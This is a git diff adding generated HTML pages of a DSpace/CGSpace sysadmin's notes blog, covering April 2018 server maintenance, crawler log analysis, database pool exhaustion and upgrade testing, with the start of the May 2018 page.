+<li>The CSV format of <code>jtohme-2018-04-04.csv</code> was:</li>
+</ul>
+<pre tabindex="0"><code class="language-csv" data-lang="csv">dc.contributor.author,cg.creator.id
+&#34;Tohme, Joseph M.&#34;,Joe Tohme: 0000-0003-2765-7101
+</code></pre><ul>
+<li>There was a quoting error in my CRP CSV and the replacements for <code>Forests, Trees and Agroforestry</code> got messed up</li>
+<li>So I fixed them and had to re-index again!</li>
+<li>I started preparing the git branch for the the DSpace 5.5→5.8 upgrade:</li>
+</ul>
+<pre tabindex="0"><code>$ git checkout -b 5_x-dspace-5.8 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.8
+</code></pre><ul>
+<li>I was prepared to skip some commits that I had cherry picked from the upstream <code>dspace-5_x</code> branch when we did the DSpace 5.5 upgrade (see notes on 2016-10-19 and 2017-12-17):
+<ul>
+<li>[DS-3246] Improve cleanup in recyclable components (upstream commit on dspace-5_x: 9f0f5940e7921765c6a22e85337331656b18a403)</li>
+<li>[DS-3250] applying patch provided by Atmire (upstream commit on dspace-5_x: c6fda557f731dbc200d7d58b8b61563f86fe6d06)</li>
+<li>bump up to latest minor pdfbox version (upstream commit on dspace-5_x: b5330b78153b2052ed3dc2fd65917ccdbfcc0439)</li>
+<li>DS-3583 Usage of correct Collection Array (#1731) (upstream commit on dspace-5_x: c8f62e6f496fa86846bfa6bcf2d16811087d9761)</li>
+</ul>
+</li>
+<li>&hellip; but somehow git knew, and didn&rsquo;t include them in my interactive rebase!</li>
+<li>I need to send this branch to Atmire and also arrange payment (see <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">ticket #560</a> in their tracker)</li>
+<li>Fix Sisay&rsquo;s SSH access to the new DSpace Test server (linode19)</li>
+</ul>
+<h2 id="2018-04-05">2018-04-05</h2>
+<ul>
+<li>Fix Sisay&rsquo;s sudo access on the new DSpace Test server (linode19)</li>
+<li>The reindexing process on DSpace Test took <em>forever</em> yesterday:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    599m32.961s
+user    9m3.947s
+sys     2m52.585s
+</code></pre><ul>
+<li>So we really should not use this Linode block storage for Solr</li>
+<li>Assetstore might be fine but would complicate things with configuration and deployment (ughhh)</li>
+<li>Better to use Linode block storage only for backup</li>
+<li>Help Peter with the GDPR compliance / reporting form for CGSpace</li>
+<li>DSpace Test crashed due to memory issues again:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
+16
+</code></pre><ul>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+<li>Proof some records on DSpace Test for Udana from IWMI</li>
+<li>He has done better with the small syntax and consistency issues but then there are larger concerns with not linking to DOIs, copying titles incorrectly, etc</li>
+</ul>
+<h2 id="2018-04-10">2018-04-10</h2>
+<ul>
+<li>I got a notice that CGSpace CPU usage was very high this morning</li>
+<li>Looking at the nginx logs, here are the top users today so far:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10                                                                                                   
+    282 207.46.13.112
+    286 54.175.208.220
+    287 207.46.13.113
+    298 66.249.66.153
+    322 207.46.13.114
+    780 104.196.152.243
+   3994 178.154.200.38
+   4295 70.32.83.92
+   4388 95.108.181.88
+   7653 45.5.186.2
+</code></pre><ul>
+<li>45.5.186.2 is of course CIAT</li>
+<li>95.108.181.88 appears to be Yandex:</li>
+</ul>
+<pre tabindex="0"><code>95.108.181.88 - - [09/Apr/2018:06:34:16 +0000] &#34;GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1&#34; 200 2638 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
+</code></pre><ul>
+<li>And for some reason Yandex created a lot of Tomcat sessions today:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2018-04-10
+4363
+</code></pre><ul>
+<li>70.32.83.92 appears to be some harvester we&rsquo;ve seen before, but on a new IP</li>
+<li>They are not creating new Tomcat sessions so there is no problem there</li>
+<li>178.154.200.38 also appears to be Yandex, and is also creating many Tomcat sessions:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=178.154.200.38&#39; dspace.log.2018-04-10
+3982
+</code></pre><ul>
+<li>I&rsquo;m not sure why Yandex creates so many Tomcat sessions, as its user agent should match the Crawler Session Manager valve</li>
+<li>Let&rsquo;s try a manual request with and without their user agent:</li>
+</ul>
+<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg &#39;User-Agent:Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#39;
+GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2638
+Content-Type: image/jpeg;charset=ISO-8859-1
+Date: Tue, 10 Apr 2018 05:18:37 GMT
+Expires: Tue, 10 Apr 2018 06:18:37 GMT
+Last-Modified: Tue, 25 Apr 2017 07:05:54 GMT
+Server: nginx
+Strict-Transport-Security: max-age=15768000
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+
+$ http --print Hh https://cgspace.cgiar.org/bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg                                                                              
+GET /bitstream/handle/10568/21794/ILRI_logo_usage.jpg.jpg HTTP/1.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Host: cgspace.cgiar.org
+User-Agent: HTTPie/0.9.9
+
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Language: en-US
+Content-Length: 2638
+Content-Type: image/jpeg;charset=ISO-8859-1
+Date: Tue, 10 Apr 2018 05:20:08 GMT
+Expires: Tue, 10 Apr 2018 06:20:08 GMT
+Last-Modified: Tue, 25 Apr 2017 07:05:54 GMT
+Server: nginx
+Set-Cookie: JSESSIONID=31635DB42B66D6A4208CFCC96DD96875; Path=/; Secure; HttpOnly
+Strict-Transport-Security: max-age=15768000
+Vary: User-Agent
+X-Cocoon-Version: 2.2.0
+X-Content-Type-Options: nosniff
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+</code></pre><ul>
+<li>So it definitely looks like Yandex requests are getting assigned a session from the Crawler Session Manager valve</li>
+<li>And if I look at the DSpace log I see its IP sharing a session with other crawlers like Google (66.249.66.153)</li>
+<li>Indeed the number of Tomcat sessions appears to be normal:</li>
+</ul>
+<p><img src="/cgspace-notes/2018/04/jmx_dspace_sessions-week.png" alt="Tomcat sessions week"></p>
+<ul>
+<li>In other news, it looks like the number of total requests processed by nginx in March went down from the previous months:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2018&#34;
+2266594
+
+real    0m13.658s
+user    0m16.533s
+sys     0m1.087s
+</code></pre><ul>
+<li>In other other news, the database cleanup script has an issue again:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+...
+Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(151626) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (151626);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Looking at abandoned connections in Tomcat:</li>
+</ul>
+<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
+2115
+</code></pre><ul>
+<li>Apparently from these stacktraces we should be able to see which code is not closing connections properly</li>
+<li>Here&rsquo;s a pretty good overview of days where we had database issues recently:</li>
+</ul>
+<pre tabindex="0"><code># zcat /var/log/tomcat7/catalina.out.[1-9].gz | grep &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; | awk &#39;{print $1,$2, $3}&#39; | sort | uniq -c | sort -n
+      1 Feb 18, 2018
+      1 Feb 19, 2018
+      1 Feb 20, 2018
+      1 Feb 24, 2018
+      2 Feb 13, 2018
+      3 Feb 17, 2018
+      5 Feb 16, 2018
+      5 Feb 23, 2018
+      5 Feb 27, 2018
+      6 Feb 25, 2018
+     40 Feb 14, 2018
+     63 Feb 28, 2018
+    154 Mar 19, 2018
+    202 Feb 21, 2018
+    264 Feb 26, 2018
+    268 Mar 21, 2018
+    524 Feb 22, 2018
+    570 Feb 15, 2018
+</code></pre><ul>
+<li>In Tomcat 8.5 the <code>removeAbandoned</code> property has been split into two: <code>removeAbandonedOnBorrow</code> and <code>removeAbandonedOnMaintenance</code></li>
+<li>See: <a href="https://tomcat.apache.org/tomcat-8.5-doc/jndi-datasource-examples-howto.html#Database_Connection_Pool_(DBCP_2)_Configurations">https://tomcat.apache.org/tomcat-8.5-doc/jndi-datasource-examples-howto.html#Database_Connection_Pool_(DBCP_2)_Configurations</a></li>
+<li>I assume we want <code>removeAbandonedOnBorrow</code> and make updates to the Tomcat 8 templates in Ansible</li>
+<li>After reading more documentation I see that Tomcat 8.5&rsquo;s default DBCP seems to now be Commons DBCP2 instead of Tomcat DBCP</li>
+<li>It can be overridden in Tomcat&rsquo;s <em>server.xml</em> by setting <code>factory=&quot;org.apache.tomcat.jdbc.pool.DataSourceFactory&quot;</code> in the <code>&lt;Resource&gt;</code></li>
+<li>I think we should use this default, so we&rsquo;ll need to remove some other settings that are specific to Tomcat&rsquo;s DBCP like <code>jdbcInterceptors</code> and <code>abandonWhenPercentageFull</code></li>
+<li>Merge the changes adding ORCID identifier to advanced search and Atmire Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/371">#371</a>)</li>
+<li>Fix one more issue of missing XMLUI strings (for CRP subject when clicking &ldquo;view more&rdquo; in the Discovery sidebar)</li>
+<li>I told Udana to fix the citation and abstract of the one item, and to correct the <code>dc.language.iso</code> for the five Spanish items in his Book Chapters collection</li>
+<li>Then we can import the records to CGSpace</li>
+</ul>
+<h2 id="2018-04-11">2018-04-11</h2>
+<ul>
+<li>DSpace Test (linode19) crashed again some time since yesterday:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
+168
+</code></pre><ul>
+<li>I ran all system updates and rebooted the server</li>
+</ul>
+<h2 id="2018-04-12">2018-04-12</h2>
+<ul>
+<li>I caught wind of an interesting XMLUI performance optimization coming in DSpace 6.3: <a href="https://jira.duraspace.org/browse/DS-3883">https://jira.duraspace.org/browse/DS-3883</a></li>
+<li>I asked for it to be ported to DSpace 5.x</li>
+</ul>
+<h2 id="2018-04-13">2018-04-13</h2>
+<ul>
+<li>Add <code>PII-LAM_CSAGender</code> to CCAFS Phase II project tags in <code>input-forms.xml</code></li>
+</ul>
+<h2 id="2018-04-15">2018-04-15</h2>
+<ul>
+<li>While testing an XMLUI patch for <a href="https://jira.duraspace.org/browse/DS-3883">DS-3883</a> I noticed that there is still some remaining Authority / Solr configuration left that we need to remove:</li>
+</ul>
+<pre tabindex="0"><code>2018-04-14 18:55:25,841 ERROR org.dspace.authority.AuthoritySolrServiceImpl @ Authority solr is not correctly configured, check &#34;solr.authority.server&#34; property in the dspace.cfg
+java.lang.NullPointerException
+</code></pre><ul>
+<li>I assume we need to remove <code>authority</code> from the consumers in <code>dspace/config/dspace.cfg</code>:</li>
+</ul>
+<pre tabindex="0"><code>event.dispatcher.default.consumers = authority, versioning, discovery, eperson, harvester, statistics,batchedit, versioningmqm
+</code></pre><ul>
+<li>I see the same error on DSpace Test so this is definitely a problem</li>
+<li>After disabling the authority consumer I no longer see the error</li>
+<li>I merged a pull request to the <code>5_x-prod</code> branch to clean that up (<a href="https://github.com/ilri/DSpace/pull/372">#372</a>)</li>
+<li>File a ticket on DSpace&rsquo;s Jira for the <code>target=&quot;_blank&quot;</code> security and performance issue (<a href="https://jira.duraspace.org/browse/DS-3891">DS-3891</a>)</li>
+<li>I re-deployed DSpace Test (linode19) and was surprised by how long it took the ant update to complete:</li>
+</ul>
+<pre tabindex="0"><code>BUILD SUCCESSFUL
+Total time: 4 minutes 12 seconds
+</code></pre><ul>
+<li>The Linode block storage is much slower than the instance storage</li>
+<li>I ran all system updates and rebooted DSpace Test (linode19)</li>
+</ul>
+<h2 id="2018-04-16">2018-04-16</h2>
+<ul>
+<li>Communicate with Bioversity about their project to migrate their e-Library (Typo3) and Sci-lit databases to CGSpace</li>
+</ul>
+<h2 id="2018-04-18">2018-04-18</h2>
+<ul>
+<li>IWMI people are asking about building a search query that outputs RSS for their reports</li>
+<li>They want the same results as this Discovery query: <a href="https://cgspace.cgiar.org/discover?filtertype_1=dateAccessioned&amp;filter_relational_operator_1=contains&amp;filter_1=2018&amp;submit_apply_filter=&amp;query=&amp;scope=10568%2F16814&amp;rpp=100&amp;sort_by=dc.date.issued_dt&amp;order=desc">https://cgspace.cgiar.org/discover?filtertype_1=dateAccessioned&amp;filter_relational_operator_1=contains&amp;filter_1=2018&amp;submit_apply_filter=&amp;query=&amp;scope=10568%2F16814&amp;rpp=100&amp;sort_by=dc.date.issued_dt&amp;order=desc</a></li>
+<li>They will need to use OpenSearch, but I can&rsquo;t remember all the parameters</li>
+<li>Apparently search sort options for OpenSearch are in <code>dspace.cfg</code>:</li>
+</ul>
+<pre tabindex="0"><code>webui.itemlist.sort-option.1 = title:dc.title:title
+webui.itemlist.sort-option.2 = dateissued:dc.date.issued:date
+webui.itemlist.sort-option.3 = dateaccessioned:dc.date.accessioned:date
+webui.itemlist.sort-option.4 = type:dc.type:text
+</code></pre><ul>
+<li>They want items by issue date, so we need to use sort option 2</li>
+<li>According to the DSpace Manual there are only the following parameters to OpenSearch: format, scope, rpp, start, and sort_by</li>
+<li>The OpenSearch <code>query</code> parameter expects a Discovery search filter that is defined in <code>dspace/config/spring/api/discovery.xml</code></li>
+<li>So for IWMI they should be able to use something like this: <a href="https://cgspace.cgiar.org/open-search/discover?query=dateIssued:2018&amp;scope=10568/16814&amp;sort_by=2&amp;order=DESC&amp;format=rss">https://cgspace.cgiar.org/open-search/discover?query=dateIssued:2018&amp;scope=10568/16814&amp;sort_by=2&amp;order=DESC&amp;format=rss</a></li>
+<li>There are also <code>rpp</code> (results per page) and <code>start</code> parameters but in my testing now on DSpace 5.5 they behave very strangely</li>
+<li>For example, set <code>rpp=1</code> and then check the results for <code>start</code> values of 0, 1, and 2 and they are all the same!</li>
+<li>If I have time I will check if this behavior persists on DSpace 6.x on the official DSpace demo and file a bug</li>
+<li>Also, the DSpace Manual as of 5.x has very poor documentation for OpenSearch</li>
+<li>They don&rsquo;t tell you to use Discovery search filters in the <code>query</code> (with format <code>query=dateIssued:2018</code>)</li>
+<li>They don&rsquo;t tell you that the sort options are actually defined in <code>dspace.cfg</code> (ie, you need to use <code>2</code> instead of <code>dc.date.issued_dt</code>)</li>
+<li>They are missing the <code>order</code> parameter (ASC vs DESC)</li>
+<li>I notice that DSpace Test has crashed again, due to memory:</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;java.lang.OutOfMemoryError: Java heap space&#39; /var/log/tomcat7/catalina.out
+178
+</code></pre><ul>
+<li>I will increase the JVM heap size from 5120M to 6144M, though we don&rsquo;t have much room left to grow as DSpace Test (linode19) is using a smaller instance size than CGSpace</li>
+<li>Gabriela from CIP asked if I could send her a list of all CIP authors so she can do some replacements on the name formats</li>
+<li>I got a list of all the CIP collections manually and use the same query that I used in <a href="/cgspace-notes/2017-08">August, 2017</a>:</li>
+</ul>
+<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/89347&#39;, &#39;10568/88229&#39;, &#39;10568/53086&#39;, &#39;10568/53085&#39;, &#39;10568/69069&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/70150&#39;, &#39;10568/53093&#39;, &#39;10568/64874&#39;, &#39;10568/53094&#39;))) group by text_value order by count desc) to /tmp/cip-authors.csv with csv;
+</code></pre><h2 id="2018-04-19">2018-04-19</h2>
+<ul>
+<li>Run updates on DSpace Test (linode19) and reboot the server</li>
+<li>Also try deploying updated GeoLite database during ant update while re-deploying code:</li>
+</ul>
+<pre tabindex="0"><code>$ ant update update_geolite clean_backups
+</code></pre><ul>
+<li>I also re-deployed CGSpace (linode18) to make the ORCID search, authority cleanup, CCAFS project tag <code>PII-LAM_CSAGender</code> live</li>
+<li>When re-deploying I also updated the GeoLite databases so I hope the country stats become more accurate&hellip;</li>
+<li>After re-deployment I ran all system updates on the server and rebooted it</li>
+<li>After the reboot I forced a reïndexing of the Discovery to populate the new ORCID index:</li>
+</ul>
+<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    73m42.635s
+user    8m15.885s
+sys     2m2.687s
+</code></pre><ul>
+<li>This time is with about 70,000 items in the repository</li>
+</ul>
+<h2 id="2018-04-20">2018-04-20</h2>
+<ul>
+<li>Gabriela from CIP emailed to say that CGSpace was returning a white page, but I haven&rsquo;t seen any emails from UptimeRobot</li>
+<li>I confirm that it&rsquo;s just giving a white page around 4:16</li>
+<li>The DSpace logs show that there are no database connections:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-715] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle:0; lastwait:5000].
+</code></pre><ul>
+<li>And there have been shit tons of errors in the last (starting only 20 minutes ago luckily):</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.PoolExhaustedException&#39; /home/cgspace.cgiar.org/log/dspace.log.2018-04-20
+32147
+</code></pre><ul>
+<li>I can&rsquo;t even log into PostgreSQL as the <code>postgres</code> user, WTF?</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c 
+^C
+</code></pre><ul>
+<li>Here are the most active IPs today:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    917 207.46.13.182
+    935 213.55.99.121
+    970 40.77.167.134
+    978 207.46.13.80
+   1422 66.249.64.155
+   1577 50.116.102.77
+   2456 95.108.181.88
+   3216 104.196.152.243
+   4325 70.32.83.92
+  10718 45.5.184.2
+</code></pre><ul>
+<li>It doesn&rsquo;t even seem like there is a lot of traffic compared to the previous days:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;20/Apr/2018&#34; | wc -l
+74931
+# zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz| grep -E &#34;19/Apr/2018&#34; | wc -l
+91073
+# zcat --force /var/log/nginx/*.log.2.gz /var/log/nginx/*.log.3.gz| grep -E &#34;18/Apr/2018&#34; | wc -l
+93459
+</code></pre><ul>
+<li>I tried to restart Tomcat but <code>systemctl</code> hangs</li>
+<li>I tried to reboot the server from the command line but after a few minutes it didn&rsquo;t come back up</li>
+<li>Looking at the Linode console I see that it is stuck trying to shut down</li>
+<li>Even &ldquo;Reboot&rdquo; via Linode console doesn&rsquo;t work!</li>
+<li>After shutting it down a few times via the Linode console it finally rebooted</li>
+<li>Everything is back but I have no idea what caused this—I suspect something with the hosting provider</li>
+<li>Also super weird, the last entry in the DSpace log file is from <code>2018-04-20 16:35:09</code>, and then immediately it goes to <code>2018-04-20 19:15:04</code> (three hours later!):</li>
+</ul>
+<pre tabindex="0"><code>2018-04-20 16:35:09,144 ERROR org.dspace.app.util.AbstractDSpaceWebapp @ Failed to record shutdown in Webapp table.
+org.apache.tomcat.jdbc.pool.PoolExhaustedException: [localhost-startStop-2] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:18; idle
+:0; lastwait:5000].
+        at org.apache.tomcat.jdbc.pool.ConnectionPool.borrowConnection(ConnectionPool.java:685)
+        at org.apache.tomcat.jdbc.pool.ConnectionPool.getConnection(ConnectionPool.java:187)
+        at org.apache.tomcat.jdbc.pool.DataSourceProxy.getConnection(DataSourceProxy.java:128)
+        at org.dspace.storage.rdbms.DatabaseManager.getConnection(DatabaseManager.java:632)
+        at org.dspace.core.Context.init(Context.java:121)
+        at org.dspace.core.Context.&lt;init&gt;(Context.java:95)
+        at org.dspace.app.util.AbstractDSpaceWebapp.deregister(AbstractDSpaceWebapp.java:97)
+        at org.dspace.app.util.DSpaceContextListener.contextDestroyed(DSpaceContextListener.java:146)
+        at org.apache.catalina.core.StandardContext.listenerStop(StandardContext.java:5115)
+        at org.apache.catalina.core.StandardContext.stopInternal(StandardContext.java:5779)
+        at org.apache.catalina.util.LifecycleBase.stop(LifecycleBase.java:224)
+        at org.apache.catalina.core.ContainerBase$StopChild.call(ContainerBase.java:1588)
+        at org.apache.catalina.core.ContainerBase$StopChild.call(ContainerBase.java:1577)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+2018-04-20 19:15:04,006 INFO  org.dspace.core.ConfigurationManager @ Loading from classloader: file:/home/cgspace.cgiar.org/config/dspace.cfg
+</code></pre><ul>
+<li>Very suspect!</li>
+</ul>
+<h2 id="2018-04-24">2018-04-24</h2>
+<ul>
+<li>Testing my Ansible playbooks with a clean and updated installation of Ubuntu 18.04 and I fixed some issues that I hadn&rsquo;t run into a few weeks ago</li>
+<li>There seems to be a new issue with Java dependencies, though</li>
+<li>The <code>default-jre</code> package is going to be Java 10 on Ubuntu 18.04, but I want to use <code>openjdk-8-jre-headless</code> (well, the JDK actually, but it uses this JRE)</li>
+<li>Tomcat and Ant are fine with Java 8, but the <code>maven</code> package wants to pull in Java 10 for some reason</li>
+<li>Looking closer, I see that <code>maven</code> depends on <code>java7-runtime-headless</code>, which is indeed provided by <code>openjdk-8-jre-headless</code></li>
+<li>So it must be one of Maven&rsquo;s dependencies&hellip;</li>
+<li>I will watch it for a few days because it could be an issue that will be resolved before Ubuntu 18.04&rsquo;s release</li>
+<li>Otherwise I will post a bug to the ubuntu-release mailing list</li>
+<li>Looks like the only way to fix this is to install <code>openjdk-8-jdk-headless</code> before (so it pulls in the JRE) in a separate transaction, or to manually install <code>openjdk-8-jre-headless</code> in the same apt transaction as <code>maven</code></li>
+<li>Also, I started porting PostgreSQL 9.6 into the Ansible infrastructure scripts</li>
+<li>This should be a drop in I believe, though I will definitely test it more locally as well as on DSpace Test once we move to DSpace 5.8 and Ubuntu 18.04 in the coming months</li>
+</ul>
+<h2 id="2018-04-25">2018-04-25</h2>
+<ul>
+<li>Still testing the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> for Ubuntu 18.04, Tomcat 8.5, and PostgreSQL 9.6</li>
+<li>One other new thing I notice is that PostgreSQL 9.6 no longer uses <code>createuser</code> and <code>nocreateuser</code>, as those have actually meant <code>superuser</code> and <code>nosuperuser</code> and have been deprecated for <em>ten years</em></li>
+<li>So for my notes, when I&rsquo;m importing a CGSpace database dump I need to amend my notes to give super user permission to a user, rather than create user:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-18.backup
+</code></pre><ul>
+<li>There&rsquo;s another issue with Tomcat in Ubuntu 18.04:</li>
+</ul>
+<pre tabindex="0"><code>25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
+ java.lang.NoSuchMethodError: java.nio.ByteBuffer.position(I)Ljava/nio/ByteBuffer;
+        at org.apache.coyote.http11.Http11InputBuffer.init(Http11InputBuffer.java:688)
+        at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:672)
+        at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
+        at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:790)
+        at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1459)
+        at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+        at java.lang.Thread.run(Thread.java:748)
+</code></pre><ul>
+<li>There&rsquo;s a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895866">Debian bug about this from a few weeks ago</a></li>
+<li>Apparently Tomcat was compiled with Java 9, so doesn&rsquo;t work with Java 8</li>
+</ul>
+<h2 id="2018-04-29">2018-04-29</h2>
+<ul>
+<li>DSpace Test crashed again, looks like memory issues again</li>
+<li>JVM heap size was last increased to 6144m but the system only has 8GB total so there&rsquo;s not much we can do here other than get a bigger Linode instance or remove the massive Solr Statistics data</li>
+</ul>
+<h2 id="2018-04-30">2018-04-30</h2>
+<ul>
+<li>DSpace Test crashed again</li>
+<li>I will email the CGSpace team to ask them whether or not we want to commit to having a public test server that accurately mirrors CGSpace (ie, to upgrade to the next largest Linode)</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-05/index.html b/docs/2018-05/index.html
new file mode 100644
index 000000000..ffc59e338
--- /dev/null
+++ b/docs/2018-05/index.html
@@ -0,0 +1,577 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2018" />
+<meta property="og:description" content="2018-05-01
+
+I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+
+http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
+http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
+
+
+Then I reduced the JVM heap size from 6144 back to 5120m
+Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-05/" />
+<meta property="article:published_time" content="2018-05-01T16:43:54+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2018"/>
+<meta name="twitter:description" content="2018-05-01
+
+I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface:
+
